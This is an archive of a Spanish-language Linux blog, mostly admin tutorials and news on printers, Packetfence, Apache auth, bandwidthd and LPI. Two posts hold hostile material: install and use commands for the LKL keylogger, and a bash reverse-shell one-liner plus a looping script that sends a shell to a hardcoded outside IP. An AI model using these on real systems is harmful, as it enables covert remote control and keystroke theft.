Mostrando entradas con la etiqueta Linux. Mostrar todas las entradas
Mostrando entradas con la etiqueta Linux. Mostrar todas las entradas

jueves, 19 de mayo de 2011

Drivers de Epson (Epson Stylus TX 420w) para Linux

Gracias a que en la oficina tuve que instalar un pequeño multifuncional Epson Stylus TX 420w tanto para escanear como para imprimir, he decidido documentar la manera en que lo hice, habré de aclarar que fue en Ubuntu 10.04 (usualmente no posteo cosas sobre Ubuntu, ya que saben bien que no lo miro con buenos ojos, sin embargo no puedo pasar la ocasión de documentarlo).
Como habrán de encontrar, Ubuntu tiene un bug (Bug #667507: epson tx420w won't print anything - pdftoraster failed) que no permite imprimir con este modelo de impresora, por lo tanto procederemos a lo siguiente:

Impresión.
  1. De la página de Openprinting, descargaremos el respectivo driver, en el caso de ubuntu para 32 bits es el paquete .deb (hacer clic en Openprinting para descargar versiones de 32 y 64 bits, empaquetadas en .rpm y .deb).
  2. Una vez descargado, pueden hacer doble clic sobre él, o bien ir a la consola y teclear: 
    1. sudo su; en el caso de distros basadas en rpm sólo es: su
    2. dpkg --install epson-[version].deb (en el caso de ubuntu)
    3. En el caso de haber descargado el paquete para una distribución en .rpm el comando es: rpm -Uvh epson-[version].rpm
  3. Con estos pasos ya podremos dar de alta una impresora en CUPS, recuerden que CUPS se maneja vía interfaz web en la dirección: http://localhost:631, sólo seleccionando la marca y el modelo. Es importante recalcar que si ya tienes la impresora dada de alta, entonces tienes que primeramente eliminarla y proceder a darla de alta nuevamente.
  4. Ahora envía una sencilla página de prueba a la impresora, si todo fue bien, felicidades!!! Ya puedes imprimir.
Escáner
Ahora toca el turno a configurar el escáner, me costó un poco de trabajo debido a que la información estaba en francés y la verdad desconfiaba un poco, aquí voy a aclarar, éste método está probado sólo en Ubuntu, desconozco si funcione en otras distros.
Bien, pues manos a la obra:
Según el enlace encontrado en un foro francés de Ubuntu, sólo necesitaremos instalar en el orden dado los siguientes paquetes:
  1. iscan-data
  2. iscan 32 bits o iscan 64 bits
  3. iscan-network 32 bits o iscan-network 64 bits (éste último supongo que es para añadir soporte de red, el cual por su puesto no lo instalé, sólo los dos primeros.)
Otra página que se ve muy buena en cuanto a los drivers para EPSON, ya sea para multifuncionales, láser, inkjet, copiadoras y todo eso es avasys. Un tutorial que nos enseña cómo hacerlo desde Avasys lo puedes encontrar aquí, tranquilo si lo encuentras en francés, para eso tenemos a translate.google.com
Chécalas y postea si pudiste encontrar alguna solución, la comunidad lo agradecerá.

Fuentes: 

lunes, 14 de marzo de 2011

Orvitux, una distro 100% mexicana


Hace unos días me enteré que en México existe un proyecto de software libre que mantiene una distro de linux, ¿qué?, ¿cómo?, pues sí, ha leído bien, hay una distro desarrollada en México. El nombre de esta distro es Orvitux, tiene su sitio en http://orvitux.com.mx/inicio/

Según lo he podido verificar, Orvitux es un desarrollo 100% jaliscience y una marca registrada. Asimismo tal como lo establece en su página, es una derivada de Unity Linux que tiene como fin impactar en el sector comercial, así como en las PC's hogareñas.

Una de las características que me comenta el propio autor es el rolling release, pero a qué se refiere esto?, pues bien, según la wiki se refiere a un sistema de software en constante desarrollo, totalmente opuesto a algunas otras distros que requieren la reinstalación de una nueva versión sobre la otra, es decir, tienen que formatear y volver a instalar y configurar todos sus paquetes; con rolling release sólo tendrán que actualizar los paquetes de una forma muy sencilla: "hacer clik en nuestro administrador de paquetes, refrescar channels y clikar donde dice actualizar todo et voilà tu sistema actualizado tendrás".

Sinceramente los invito a que prueben la distro (yo también lo haré!!), una manera que tenemos todos de contribuir con el creador es precisamente haciéndolo y reportando bugs así como aquellas características que ustedes crean que deban incluirse.

Orvitux está presente en facebook, su grupo lo puedes encontrar en (clic en la imagen):
 

La descarga de la ISO puede ser desde http://orvitux.com.mx/inicio/index.php/descarga-orvitux

Las sugerencias que vayan teniendo, así como los bugs, las pueden hacer a la dirección http://forum.unity-linux.org/forum-45.html, tan sólo habrá que registrarse para poderlo realizar.

lunes, 3 de enero de 2011

Control de monitores y proyectores de vídeo en Linux

Primero que nada les envío una felicitación con motivos del año que recién comienza a quienes sigan este blog.



Bueno, por otra parte les hablaré sobre el control de monitores y proyectores de video en Linux (principalmente para las laptops), que como ya muchos sabrán es un dolor de cabeza el no saber de que manera gestionarlos mediante el teclado, ya que en su mayoría estamos acostumbrados a presionar un par de teclas y enviar la señal al proyector.

Yo tengo una laptop de la marca Compaq y por defecto KDE tiene una configuración para el teclado multimedia que me permitía usar precisamente esa combinación de teclas para controlar el proyector de video, sin embargo a partir de la versión 13.1 de Slackware hubo un cambio en el servidor X.org, el cual ya no ocupa el tradicional archivo de configuración /etc/X11/xorg.conf, y me supongo que debió llevar más cambios no sólo ese, razón por la cual ya no funciona este método. Ahora tengo que pelearme con el sistema para que de alguna manera se pueda seguir empleando el proyector.
Pues bien, parece ser que he encontrado una solución, desgraciadamente no he tenido tiempo de probarla, se basa en el uso de RandR (Resize and Rotate).

Gracias a nuestros amigos de Linux Magazine en español, he encontrado un artículo bastante explicativo de como emplear esa herramienta para gestionar esos proyectores. El archivo lo puedes descargar de la página de LinuxMagazine.com aquí.

Fuente Original: Linux Magazine en Español.

lunes, 20 de diciembre de 2010

Packetfence, blocking unwanted traffic in the LAN

Now that I'm "fan" of linux.com via facebook, I saw this little tuto regarding to "Block Traffic", I just decided to post it 'cause already I'm Network Manager and I might use this information in not so far future. Well here comes post.


Packetfence is a very powerful Network Access Control tool. Using Packetfence you can control and block unwanted traffic on your network. Want to block P2P services like BitTorrent, or keep mobile devices like iPhones and Android phones off your wireless network? Packetfence gives you the kind of fine-grained control you're looking for.

Packetfence is officially supported on Red Hat Enterprise Linux (RHEL) and CentOS. With those two distributions you can quickly get Packetfence up and running (Unlike on Ubuntu which I recently outlined in "Install and Configure Packetfence on Ubuntu Linux"). But you are not relegated to command line only (as you will find in Ubuntu). With Red Hat or CentOS you will find a powerful web-based tool at your fingertips. With this tool you can easily manage Packetfence. But not all aspects of Packetfence can be handled from the web-based GUI.
 
Assumptions

What I want to demonstrate is how to block specific traffic on your Packetfence-enabled network. I will assume just a few items:
You already have Packetfence installed and working properly (I will be demonstrating on CentOS 5)
You have administrative rights to the machine Packetfence is installed on.

That's all. I am going to demonstrate how to block two types of traffic. First I am going to demonstrate how to block P2P traffic (such as Limewire) which will be followed by how to block iPhone/Android phone access to your network.
 
Adding the Final Piece: Snort

In order for Packetfence to block specific services or devices you have to enlist the help of Snort. Snort is a network intrusion detection system. In order to install Snort, follow these steps:
 
  1. Open up a terminal window.
  2.  su to the root user or use sudo.
  3.  Issue the command yum install snort
With Snort installed you are almost ready. However, you will need to get rules so that Snort knows what is an intrusion. By default Snort installs without any rules. In order to add rules you have two options:
 
  • Write your own rules.
  •  Download and install pre-configured rules from the Snort Website 
I highly recommend you opt for the latter (as writing your own rules will take a lot of time and effort). To do this you will need to register on the Snort web site. You can sign up for the free account and still download rules. Once you have signed up and activated your account, download the rules and then follow these steps:
 
  1. Open up a terminal window.
  2. Change to the directory the snortrules-snapshot-XXX.tar.gz file was downloaded to (Where XXX is the release number that matches the Snort release installed on your machine.)
  3. Issue the command tar xvzf snortrules-snapshot-XXX.tar.gz (Where XXX is the release number).
  4. Change into the newly created rules folder.
  5. Issue the command cp * /etc/snort/rules/
You now have all the rules you need for Snort to work. Start up Snort with the command /etc/rc.d/init.d/snortd start. You should now see /var/log/messages starting to fill up with information from Snort. Now it's time to re-configure Packetfence.
 
Enable Snort

Since you just added Snort, you need to make Packetfence aware. To do this open up the /usr/local/pf/conf/pf.conf file and add the following:

[services]

snort=/usr/sbin/snort


Save the file and restart Packetfence with the command /usr/local/pf/bin/pfcmd service pf restart — Packetfence is now using Snort.
 
Choosing the Correct Template

Before we can get into the actual configuration and blocking of services/devices, we first have to re-configure Packetfence to run in a mode other than testing. In the first article I illustrated how to configure and start Packetfence in testing mode. This is great for making sure things are working as Packetfence will only log events (not act upon them). In order to get Packetfence to actually act upon a violation, you have to reconfigure it to run using a different template. The templates you can choose from are:
 
  • Test mode
  • Registration
  • Detection
  • Registration & Detection
  • Registration, Detection & Scanning
  • Session-based Authentication

     
The template you want to choose is Registration, Detection & Scanning. In order to do that open up a terminal window and do the following:
 
  • su to the root user.
  • Change to the /usr/local/pf directory.
  • Issue the command ./configurator.pl .
  • Select option [5] for Registration, Detection & Scanning.
  • Answer all of the questions (this will be similar to your initial installation, as shown in the first article).
  • Now cd into the /usr/local/pf/bin directory.
  • Issue the command ./pfcmd service pf restart.
     
Packetfence is now working in the proper mode to act against violations. However, it doesn't know what is a violation. For that we have to turn to the /usr/local/pf/violations.conf file.
 
Enabling Specific Violations

In the violations.conf file you will see a long laundry list of violations. Each violation section looks like:

[2000334]
desc=P2P (BitTorrent)
priority=8
url=/content/index.php?template=p2p
disable=Y
max_enable=1
trigger=Detect::2000334,Detect::2000357,Detect::2000369


The above violation is for BitTorrent connections. As you can see this violation, in its default state, is disabled. To enable this violation all you need to do is change the line:

disable=Y

to

disable=N

You will find, listed in the violations, the P2P violation and the Android device violation. Enable both of those, save the file, and restart Packetfence. Now, any device that violates the enabled violations will be denied access and will be logged.
 
Web Interface



As I mentioned, Packetfence does come with a spiffy Web interface that allows you to manage your Packetfence-protected network. To access this tool open up your browser and point it to https://ADDRESS_TO_SERVER:1443. When you arrive at this site you will have to log in with your admin credentials (configured during installation of Packetfence). Upon successful authentication you will find yourself at the Packetfence web interface (see Figure 1). Here you can manager each node on your network, add users (for authentication), start/stop various pieces of Packetfence, and configure Packetfence.

From the Violation tab you can even enable/disable violations using a simple drop-down to select the particular violation you want to enable.
 
Final Thoughts


As far as Network Access Control goes, you will be hard-pressed to find a more powerful tool than Packetfence. Not only is it powerful, but once installed and configured it is easy to administer and manage. Of course, there is so much more that can be done with Packetfence. For more information read through the outstanding guides offered on the Packetfence Documentation page.

Original source can be found at linux.com

jueves, 9 de diciembre de 2010

Referencia de IPTABLES



A petición del compañero spark pues les dejo una referencia de IPTABLES, la pueden descargar de aquí.

Ojo, no es la que yo usé cuando aprendí, sin embargo es muy buena, ya la revisé. 

domingo, 28 de noviembre de 2010

Linux Ebooks


Hi folks, in my inbox I have a new email from tips-linux.net team, sincerely it's kind of weird 'cause the whole email body says "You might find useful these books", so the list shown below is being displayed:


Finally a big acknowledge to our friends from tips-linux.net, today there's no original source 'cause as I said, I've received it into my inbox.

I hope somebody could find this helpful.

jueves, 14 de octubre de 2010

Neuroimaging research in Debian

OMG, surfing the web I found this interesting article, I didn't know the fact that debian had a branch dedicated to develop dedicated to neuroimaging, it's really surprising...
Debian 6.0 “squeeze” will be the first GNU/Linux distribution release ever to offer comprehensive support for magnetic resonance imaging (MRI) based neuroimaging research. It comes with up-to-date software for structural image analysis (e.g. ants), diffusion imaging and tractography (e.g. mrtrix), stimulus delivery (e.g. psychopy), MRI sequence development (e.g. odin), as well as a number of versatile data processing and analysis suites (e.g. nipype). Moreover, this release will have built-in support for all major neuroimaging data formats.
Please see the Debian Science and Debian Med task pages for a comprehensive list of included software and the NeuroDebian webpage for further information.
NeuroDebian at the Society for Neuroscience meeting 2010
The NeuroDebian team will run a Debian booth at the Society for Neuroscience meeting (SfN2010) that will take place November 13-17 in San Diego, USA. The annual meeting of the Society for Neuroscience is one of the largest neuroscience conferences in the world, with over 30,000 attendees. Researchers, clinicians, and leading experts discuss the latest findings about the brain, nervous system, and related disorders.

martes, 7 de septiembre de 2010

Instalación de Centreon/Nagios


Bien, pues lo prometido es deuda, aquí dejo la un poco de la documentación de Centreon en español, hago la aclaración que no es toda, ya que es demasiado extensa para traducirla toda y la verdad el trabajo no me deja. Sin embargo si es suficiente para poder hacer funcionar un sistema de monitoreo basado en Centreon/Nagios.

http://es.scribd.com/doc/53331474/Instalacion-y-configuracion-de-Centreon-2-con-FAN

http://es.scribd.com/doc/54214705/Instalacion-y-configuracion-de-Centreon-2

En caso de no poder accederlo, por favor envíenme un email a: decibel.elektrobeat en gmail

miércoles, 25 de agosto de 2010

Taller de Linux


Hola a todos chicos, aquí les dejo un enlace para descargar el material visto en el curso de Administración Básica de Linux.


Después les subiré la demás bibliografía usada.

Saludos a todos...

domingo, 22 de agosto de 2010

Aviso: próxima publicación de documentación de Centreon

Para quienes consulten este blog, sépanse que en unos días más haré la publicación sobre la manera de configurar Centreón, ya que lo he terminado, entregado y me han calificado, y pues la verdad no es mi intención guardar ese conocimiento tan valioso para mi solo.

Espero algunos comentarios para si a alguien le urge que lo suba

miércoles, 4 de agosto de 2010

PandoraFMS



Hace un tiempo comenté que estaba usando Centreon, un front-end para Nagios, desgraciadamente la documentación para Centreon es escasa y limitada al idioma francés, pues bien, por azares del destino me he encontrado a uno de los competidores de Nagios, su nombre es PandoraFMS y también es Open Source. Este sistema sí tiene documentación disponible en el idioma de Cervantes. 

Pandora FMS es un software de Código Abierto que sirve para monitorizar y medir todo tipo de elementos. Monitoriza sistemas, aplicaciones o dispositivos. Permite saber el estado de cada elemento de un sistemas a lo largo del tiempo.

Pandora FMS puede detectar si una interfaz de red se ha caído, un ataque de "defacement" en una web, una pérdida de memoria en algun servidor de aplicaciones, o el movimiento de un valor del NASDAQ. Pandora FMS puede enviar SMS si un sistema falla o cuando las acciones de Google bajan de 500 dólares.


En lo personal, yo no lo he probado, pero de haberlo sabido antes, pues lo hubiera usado.

La página en español se encuentra aquí.

Ksplice, actulizar el kernel sin reiniciar


Queridos lectores, se acabaron esas tardes en la oficina a esperar que todo el mundo se valla para reiniciar una maquina, eso se acabo. La gente de ksplice ha pensado en esto y nos ofrece su software para poder tener la máxima disponibilidad.


Funciona congelando el sistema dejando solo un proceso abierto, entonces es cuando se actualiza el kernel, una vez actualizado se descongela el sistema con el kernel nuevo.

Si tenemos Ubuntu lo podemos conseguir gratis, si no debemos abonar cerca de 4 dolares al mes.


Fuente aquí

Keylogger para Linux, LKL


LKL, data del 2005 pero hace su trabajo y funciona. Para el que no sepa lo que haces, este programa, captura todos los movimientos que haces con el teclado a grandes rasgos. 
Para instalar:

#wget http://switch.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz
#tar xvf lkl-0.1.1.tar.gz
#cd lkl
#./configure
#make && sudo make install

Listo, para usar:

#lkl -l -k keymaps/us_km -o captura.txt


Fuente Original aquí.

Directorios de Apache protegidos por contraseña




 

Buscando en internet por alguna información de redes, me encontré con este artículo y decidí postearlo porque considero que es interesante.

La situación es la siguiente, tenemos la carpeta /var/www/hide/ que esta disponible para todos pero queremos que no. Así que empezamos:

El comando siguiente nos crea el archivo y un usuario, es como el comando adduser
#htpasswd -c /etc/httpd/passwd elektrobeat

Ahora unos arreglos en el fichero de configuración de apache, deberás añadir estas lineas:

<Directory “/var/www/hide/”>
AuthType Basic
AuthName “Directorio Restringido”
AuthUserFile /etc/httpd/passwd
Require user elektrobeat
</Directory>

Reiniciamos apache:
#/etc/init.d/httpd restart

Si queremos más usuarios:
#htpasswd -b /etc/httpd/passwd decibel

Si queremos que más de 2 usuarios vean la carpeta
/var/www/hide/ el fichero de apache será así:

<Directory “/var/www/hide/”>
AuthType Basic
AuthName “Directorio Restringido”
AuthUserFile /etc/httpd/passwd
Require user elektrobeat
Require user decibel
</Directory>

Cuando hagas cambios en el fichero de apache debes de reiniciar el servicio.


Fuente original aquí
 

lunes, 2 de agosto de 2010

OpenOffice 3.3 está de camino.


Afortunadamente, no todos los proyectos que heredó Oracle de Sun están en estado de animación suspendida y, en el caso de OpenOffice.org, nada más lejos de la realidad. El día 24 de julio se decretó el "feature freeze" para la versión 3.3 de la suite.

Esto significa que a partir de ahora, no se admiten nuevas modificaciones ni adiciones a las características ya establecidas de la versión, sólo parches y correcciones de errores.

Un "feature freeze" suele ser indicativo de que el lanzamiento de una nueva versión de un software es inminente (significando "inminente" en este contexto "cuestión de semanas" ), por tanto, es muy probable que veamos OpenOffice.org 3.3 antes del final del verano.

Seamos objetivos, puedo decir que OpenOffice es una suite de oficina gratuita y libre, ciertamente se presta para ser productivo, pero la verdad es que Office de Micro$$oft le lleva mucho la delantera en la versatilidad que presta en cuanto al manejo de contenidos visuales, yo personalmente no me acostumbro a usar openoffice.

Fuente: Linux Magazine aquí.

jueves, 29 de julio de 2010

Touchpad para Laptop con Xorg

Como ya había posteado anteriormente, desde la versión 13.0 de Slackware se hizo una actualización de Xorg-server, la cual ya no requiere un archivo de configuración xorg.conf
 
La configuración por defecto de HAL para los touchpads de laptop no es completamente satisfactoria. De hecho, es imposible hacer un click (en la superficie del touchpad) o desplazamiento (secuencia de elevadores verticales y horizontales pasando el dedo sobre el lado derecho o inferior). 

Afortunadamente, se puede editar y arreglar todo eso! 

El procedimiento es el siguiente:
 
Copia el fichero de configuración de synaptics por defecto  de HAL: 

mkdir -p /etc/hal/fdi/policy/10osvendor 

cp -p /usr/share/hal/fdi/policy/10osvendor/11-x11-synaptics.fdi  /etc/hal/fdi/policy/10osvendor

Entonces, sólo cambia el contenido mediante la adición de las siguientes opciones si no existen. Aquí, por ejemplo el contenido de un archivo de configuración que permite que el desplazamiento vertical y horizontal y click:

<?xml version="1.0" encoding="ISO-8859-1"?>
<deviceinfo version="0.2">
<device>
<match key="info.capabilities" contains="input.touchpad">
<merge key="input.x11_driver" type="string">synaptics</merge>
<merge key="input.x11_options.protocol" type="string">auto-dev</merge>
<merge key="input.x11_options.SHMConfig" type="string">true</merge>
<merge key="input.x11_options.VertEdgeScroll" type="string">true</merge>
<merge key="input.x11_options.HorizEdgeScroll" type="string">true</merge>
<merge key="input.x11_options.VertScrollDelta" type="int">100</merge>
<merge key="input.x11_options.UpDownScrolling" type="string">true</merge>
<merge key="input.x11_options.TapButton1" type="string">1</merge>
<merge key="input.x11_options.TapButton2" type="string">2</merge>
<merge key="input.x11_options.TapButton3" type="string">3</merge>
</match>
</device>
</deviceinfo>


Hago la aclaración que esto lo encontré en un blog en francés, sólo decidí postearlo porque creo que es muy útil, la fuente aquí.

viernes, 23 de julio de 2010

Monitoreo de redes con bandwidthd sobre CentOS

Bien, pues una vez adentrado en el mundo de las redes, me corresponde ser responsable por el área de redes de la empresa donde laboro. 
Una parte que no me gustó cuando recibí el cargo sobre este departamento es que la documentación sobre la red es escasa, sólo me fue entregado un diagrama a bloques de quienes estaban conectados a un segmento de la red, sin configuraciones de los Routers, Switches, ni mucho menos se tiene un control de ancho de banda y del tráfico.

Por una parte ya me he dado a la tarea de documentar la mayoría de los aspectos que considero relevantes (también trato de hacerlo como especifica Cisco). En lo que respecta al control del ancho de banda, ya he podido reconfigurar los equipos pero aún me falta establecer la línea de base (baseline). Definiendo como línea de base, al conjunto de características que reunimos sobre la red y que nos proveen una perspectiva de su "personalidad", es decir, así sabremos cómo se aprovechan los recursos de red y en qué tiempos son mayormente demandados.
A recomendación de mi último instructor de Cisco, los puntos fuertes que se requieren monitorear para obtener la información son:
  • Latencia de Ping.
  • Carga de Memoria.
  • Carga del CPU
  • Cantidad de tráfico que atravieza por la interface (FastEthernet, Serial, GigabitEthernet, etc)
  •  Monitoreo por protocolo (TCP/UDP).
  • Una vez que se tiene el monitoreo por protocolo y que se ha descubierto el que genera mayor tráfico, entonces procedemos a monitorear por puertos (es obvio que hay algunos puertos que son mayormente usados para tráfico TCP y otros para tráfico UDP).
 Yo por lo pronto lo implementé sobre Centreon, un front-end web que utiliza como back-end Nagios, pero adicionalmente incorpora algunas herramientas como RRDtool y scripts. En mi caso utilicé Centreon para que trabaje en base a SNMP (Simple Network Management Protocol) y el uso de OID's, pero se puede hacer de muchas maneras; pero existe un pequeño problema con Centreon, el monitoreo de tráfico TCP/UDP lo hace por puerto, y primeramente requiero tener un panorama general del tráfico que atravieza la red, para ello me auxiliaré de la herramienta llamada Bandwidthd, descargable desde aquí.

Procediendo a la configuración, mencionaré que lo voy a hacer sobre CentOS release 5.4 (Final).

  1. Resolver todas las dependencias para compilar desde los archivos fuentes:
    • gcc (yum install gcc, solicitará confirmación para descargar las dependencias, así que contestamos: yes)
    • libpng-devel (yum install libpng-develsolicitará confirmación para descargar las dependencias, así que contestamos: yes)
    • gd-devel  (yum install gd-develsolicitará confirmación para descargar las dependencias, así que contestamos: yes)
    • libpcap-devel  (yum install libpcap-develsolicitará confirmación para descargar las dependencias, así que contestamos: yes)
    • make
  1. Descargamos el programa Bandwidht
  2. Lo copiamos a la carpeta /usr/src, sólo por buenas prácticas y por mantener el control de programas instalados en linux a partir de los fuentes.
  3. Descomprimimos el archivo con: tar xvzf bandwidthd-2.0.1.tgz
  4. Ingresamos a la carpeta bandwidthd-2.0.1
  5. Ejecutamos ./configure
  6. Si todo ha ido bien en el paso anterior, entonces no debería mostrar errores, ejecutamos make && make install 
  7. Con la ejecución anterior, ya tenemos instalado bandwidthd en nuestro linux. En mi caso, la instalación de los binarios quedó bajo el directorio /usr/local/bandwidthd y los archivos web están en /usr/local/bandwidthd/htdocs.
  8. Yo ya tengo corriendo el servicio de apache, y el directorio de los archivos web es /var/www/html con lo cual solo debo de hacer un enlace simbolico para poder acceder desde mi navegador. El enlace lo hice con ejecutar la instruccion ln -s /usr/local/bandwidhtd/htdocs /var/www/html/bandwidht.
  9. Ahora ya podemos ir al navegador e introducir http://localhost/bandwidhtd para poder visualizar las gráficas.
 NOTA: Ahora sólo faltará hacer unos ajustes a las configuraciones del archivo bandwidht.conf el cual en mi caso está localizado en la ruta /usr/local/bandwidhtd/etc/bandwidht.conf

En lo personal creo que Centreon puede ser usado a la par con bandwidhtd ya que la información que ésta provee es de manera genérica sobre el tráfico, asimismo nos proporciona una vista muy general sobre la red.

NOTA: Para quienes leyeron que sé usar Centreon y requieren documentación, déjenme decirles que la información SÓLO ESTÁ EN FRANCÉS, más tarde la publicaré porque debo traducir todo el manual al español y eso va a llevar tiempo. Como consejo les puedo decir que user el traductor de google para hacer búsquedas en francés, así como para traducir las páginas, yo ya lo probé y es bastante bueno, aunque no es perfecto (ojo, también puedo leer en francés).

jueves, 17 de junio de 2010

Acuerdo Novell-LPI sobre certificación común

Rulando por Internet me encontré esta información bastante útil para quienes nos interesa el mundo Linux.


Se firma acuerdo  para certificación dual .....

Novell y el Instituto Profesional de Linux(LPI) Socios en Formación Linux y Procesos de Certificación

(SACRAMENTO, CA , US y WALTHAM, MA, US:  09 de Febrero del 2010) Novell Inc. y el Instituto Profesional de Linux (LPI) anuncian hoy  un acuerdo de Partners a nivel internacional para estandarizar sus programas de certificación de nivel junior o principiante en torno al LPIC-1. Dentro de este programa, los profesionales Linux que hayan alcanzado  la certificación LPIC-1 estarán satisfaciendo los requerimientos para la certificación Novell® Certified Linux Administrator (CLA). Y para demostrar un mayor apoyo, los Servicios de Formación de Novell han aceptado formalmente incluir los objetivos de formación del LPIC-1 en el material de estudio de su curso CLA.

 

“Como un reconocido proveeedor de software empresarial y servicios por más de 25 años, y el proveedor de la plataforma Linux más interoperable, Novell está muy bien posicionada para ofrecer  un exhaustivo programa de formación que asegura a los profesionales Linux poder lograr la reconocida certificación LPIC-1, facilitándoles a ellos el poder cumplir con los diversos requerimientos que exige un Centro de Datos en cuanto habilidades técnicas y confianza”, dijo Markus rex, Director General Vicepresidente senior de la Plataforma Abierta de Soluciones de Novell.

 

La elección de  Linux,  incluyendo SUSE® Linux Enterprise de Novell, se está acelerando desde el momento en que la industria busca soluciones que ahorren costes y que al mismo tiempo sea fiable y manejable. Un estudio global realizado en 2009 entre ejecutivos IT reveló que el 40 %   de los participantes piensa adquirir soluciones Linux adicionales para los siguientes 12-24 meses y el 49 % indicó que Linux será su principal plataforma de servidores de aquí a cinco años.

 

“ Este Acuerdo de Partners da una idea del enorme apoyo que el programa de certificación LPI tiene entre las amplias comunidades IT y Linux . Este apoyo histórico ha incluido contribuciones de proveedores como Novell y ha ayudado a LPI a transformarse en la certificación Linux más ampliamente reconocida y aceptada,” dijo Jim Lacey, presidente y CEO de LPI. “Esperamos expectantes poder trabajar conjuntamente con Novell para promover el desarrollo de la fuerza de trabajo Linux del futuro. En particular,  al alinear sus programas de estudio con los objetivos del LPIC-1, Novell ha reconocido la necesidad de la industria de contar con un programa de certificación independiente de proveedores y que prepare a los profesionales IT para trabajar con cualquier distribución Linux en el ambiente empresarial.”

 

Según los términos del acuerdo,  todos aquellos* que posean la certificación LPIC-1 tendrán la oportunidad de solicitar la certificación CLA de Novell sin necesidad de exámenes o pagos adicionales. El Servicio de Formación de Novell va a incluir los objetivos de LPIC-1 en el programa de estudio de su Linux Administrator y en programas que incluyen auto-estudio, bajo demanda, y presencial (* Este programa no está disponible en Japón)

 

 

“ En su condición de Partner de Formación Autorizado dentro del programa de partner de Novell, , SwitchDesk ha formado el personal IT de algunas de las empresas lideres del país como Ford Motor Company, Boeing, Macromedia, NASA y muchas más, afirmó Chris Clark, Pesidente y CEO de SwitchDesk Inc. “Nos alegra constatar el acuerdo de partner entre Novell y LPI que permite  desarrollar contenidos de cursos con objetivos alineados y  proveer certificaciones duales de tal forma que nuestros clientes poseerán una amplia gama de habilidades profesionales.”

 

Más información sobre como adquirir la certificación dual puede ser encontrada en Novell aquí:

www.needURL.com   y  en Linux Professional Institute aquí: www.lpi.org/cla

 

 

Sobre Novell:

Novell, Inc (Nasdaq:NOVL) prove la plataforma Linux* más interoperable y un portafolio de software de gestión IT integrado que ayuda a sus clientes alrededor del mundo a reducir costes, complejidad y riesgos. Con  nuestro software de infraestructura y ecosistema de Partners, Novell integra armónicamente entornos IT heterogeneos, permitiendo a la gente y la tecnología trabajar como uno solo. Por más información visite www.novell.com

 

 

Sobre el Instituto Profesional de Linux:

El Instituto Profesional de Linux promueve y certifica capacidades esenciales en Linux y tecnologías del Código Abierto a través de la creación de exámenes altamente comprensibles, de gran calidad y además independientes de cualquier distribución.

Establecido como un organismo internacional sin animo de lucro en Setiembre de 1999 y siendo una demanda de la comunidad Linux, el Instituto Profesional de Linux sigue demostrando un claro liderazgo en la certificación de profesionales Linux a nivel mundial. LPI ayuda a avanzar al movimiento Linux y Open Source a través de sus socios estratégicos, patrocinadores, programas innovadores, y actividades con la comunidad. Los mayores patrocinadores financieros de LPI son : los patrocinadores Platinium IBM, Linux Journal, Linux Magazine, Novell, SGI, y TurboLinux, como así también los patrocinadores Oro HP e IDG

Desde 1999, LPI ha realizado más de 230.000 exámenes y otorgado 75.000 certificaciones LPIC en todo el mundo.


Fuente Original del documento aquí


jueves, 13 de mayo de 2010

Phoning home from bash

Muy interesante artículo sobre telefonía desde una consola bash.
Revision 0.0, 22 January 2002

Bash can create an outgoing connection to a netcat listener in one line of code. This is a reverse telnet session.
1. Why
There are a couple of possible applications for this technique (if your version of bash supports it):
A dial-up machine can yield control to a central agency when it arrives on the internet. (This is great if you trust your routers...)
Control of a machine behind certain types of firewall (`just copy and paste this to your command line, and I'll sort your problem out')
It's a really fun thing to run instead of idonce you have a non-interactive shell on a machine by using the perl open '|command' bug) (I have code which does this ...)
Nobody seems to have done it before. All the other solutions I have seen utilise two pipes and two instances of telnet or netcat on the server side. Scripting of telnet is prone to error because of delay conditions, and netcat may not be available on the client side (although if it is, netcat -e can get you quite far sometimes).
2. How to
2.1 Client side stuff

On the client side, netcat listens for an incoming call.
netcat -l -p 22222

2.2 Server side stuff

On the server side, an interactive bash session is started, with input, output and error messages redirected to an outgoing TCP connection.
bash -i >& /dev/tcp/101.102.103.104/22222 0>&1

Probably your IP address is not 101.102.103.104 (it's reserved) so you can replace that with your own IP address.

3. Bugs
Job control doesn't work, since there is no terminal.
Ctrl+C doesn't work so well.
It's only one line.
Some distributions compile bash without support for special /dev/tcp handling. Hack into an different distribution if this happens to you.

4. Script
Here's a script which phones us repeatedly - very nice for remote support through a firewall.
#! /bin/bash
IP=196.30.113.3
PORT=65534
WHOAMI="`whoami`@`hostname -f`"
echo "
/////////////////////////////////////////////////
//
// This script is sending a shell as the user
// $WHOAMI to the address
// $IP (port $PORT)
//
/////////////////////////////////////////////////

"
while true; do
echo "`date`: Sending shell to $IP:$PORT"
{
echo "Welcome, $WHOAMI"
bash -i
} <> /dev/tcp/$IP/$PORT 1>&0 2>&1 &
sleep 10
done

Of course, you probably don't want to run this on your server without changing your IP addresses.

5. Licence

How do you licence one line of source code? You would have to be a little silly.

Fuente aquí.

Fuentes LPIC

A quien le interese, aquí dejo un par de excelentes referencias sobre el mundo linux, concretamente son ligas referentes al LPIC.

Como sabrán, los exámenes del LPI (Linux Professional Institute) certifican un mínimo de conocimiento sobre la administración de un sistema operativo Linux, dejando de lado la distribución, es decir, se enfoca en el conocimiento a fondo del sistema y su administración a través de la shell (para los no natos, es una consola de administración tipo MS-DOS, pero posee un lenguaje de programación de scripts propio, el cual ningún sistema Windos posee).

Descargas:

  • Linux 101 Examination, Modular Training Notes. PDF
  • Linux 102 Examination, Modular Training Notes. PDF
  • Linux 101 Examination, Modular Training Notes. OpenOffice Documents here.
  • Linux 102 Examination, Modular Training Notes. OpenOffice Documents here.

La fuente original de las descargas la encuentras aquí.

Como habrás de saber, para aprobar el nivel Junior del LPI, debes aprobar los exámenes LPI 101 y LPI 102.